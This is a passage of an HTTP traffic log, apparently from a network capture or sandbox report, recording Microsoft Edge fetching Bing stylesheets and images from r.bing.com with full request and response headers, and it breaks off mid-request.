Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097612
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/MQ6FjmtU3HtHUWBpUy7g5MH2bEs.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/MQ6FjmtU3HtHUWBpUy7g5MH2bEs.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 238
Content-Type: text/css
Content-Encoding: br
Content-MD5: O40tZSLTj9W7oKdaBJR1CA==
Last-Modified: Tue, 24 Sep 2024 06:15:17 GMT
ETag: 0x8DCDC6042F126BD
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a50100c3-b01e-002a-360e-169fd5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=300767
Expires: Wed, 09 Oct 2024 03:38:16 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f0977dc
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/xiLiwvf1fPHGHn1FtpBZ7OjyW7k.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/xiLiwvf1fPHGHn1FtpBZ7OjyW7k.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 150
Content-Type: text/css
Content-Encoding: br
Content-MD5: WwHxFG6mixai/EK0hkq1gA==
Last-Modified: Tue, 24 Sep 2024 07:13:37 GMT
ETag: 0x8DCDC6868B1686D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 750756b9-401e-001d-65d4-15337a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=275743
Expires: Tue, 08 Oct 2024 20:41:13 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f09796d
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Yb-MiHwFpZo4XYbuuNLKCnyhd1M.gz.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/Yb-MiHwFpZo4XYbuuNLKCnyhd1M.gz.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 375
Content-Type: text/css; charset=utf-8
Content-Encoding: gzip
Content-MD5: 5S1KJFL4/jq12fkMTKSaRg==
Last-Modified: Tue, 24 Sep 2024 06:34:21 GMT
ETag: 0x8DCDC62ECDE4B01
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2048e941-201e-0049-80a9-14d9f0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=147088
Expires: Mon, 07 Oct 2024 08:57:01 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f097c01
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/pXxJPt-kWYQnUnlxJybiIouKkzc.gz.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/pXxJPt-kWYQnUnlxJybiIouKkzc.gz.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 1441
Content-Type: text/css
Content-Encoding: gzip
Content-MD5: zy5VCpLOrBzfjOEzb3ciOQ==
Last-Modified: Tue, 24 Sep 2024 07:01:17 GMT
ETag: 0x8DCDC66AFF2F80E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3f1927cc-901e-0079-2f5d-1683da000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=334489
Expires: Wed, 09 Oct 2024 13:00:22 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099419
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/4L4QdyjTv0HYE2Ig2ol9eYoqxg8.svg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 1101
Content-Type: image/svg+xml
Content-MD5: kc0Rz8ymXPrOlhUyaNcfYw==
Last-Modified: Fri, 12 Aug 2022 20:45:00 GMT
ETag: 0x8DA7CA3867FC831
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: adc41e54-901e-0086-2e09-15d69f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Akamai-GRN: 0.097b1060.1686747743.2aab8902
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Akamai-GRN: 0.097b1060.1686747764.2aac12e8
Akamai-GRN: 0.2a7b1060.1687568922.2d70b24a
Akamai-GRN: 0.3d7b1060.1689052474.2206a8cd
Akamai-GRN: 0.21aedd58.1689771282.bd10a3b
Cache-Control: public, no-transform, max-age=9630567
Expires: Sat, 25 Jan 2025 03:15:00 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f09951f
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/95z5wMy4UcfbSSSlSw780vQ5jKA.jpg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/95z5wMy4UcfbSSSlSw780vQ5jKA.jpg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 5387
Content-Type: image/jpeg
Content-MD5: adFid0+JT/i5IDMON2t6Yg==
Last-Modified: Tue, 27 Dec 2022 02:26:51 GMT
ETag: 0x8DAE7B1D074A0DB
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 45431781-d01e-004d-1f6f-fccb40000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=99068
Expires: Sun, 06 Oct 2024 19:36:41 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f0999ba
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/ni3MyKKVu9pK0SgY6gb6Z2NOGpg.jpg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/ni3MyKKVu9pK0SgY6gb6Z2NOGpg.jpg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 3814
Content-Type: image/jpeg
Content-MD5: KBVwYR+JIZqXDyWJ+YoJ2w==
Last-Modified: Tue, 24 Sep 2024 06:58:31 GMT
ETag: 0x8DCDC664D1860E2
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8fd3233b-801e-004f-1137-162e88000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=317999
Expires: Wed, 09 Oct 2024 08:25:32 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099ae3
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/u9MH0YsDk2rD9WC1wmU_Hi2hXtM.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/u9MH0YsDk2rD9WC1wmU_Hi2hXtM.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; 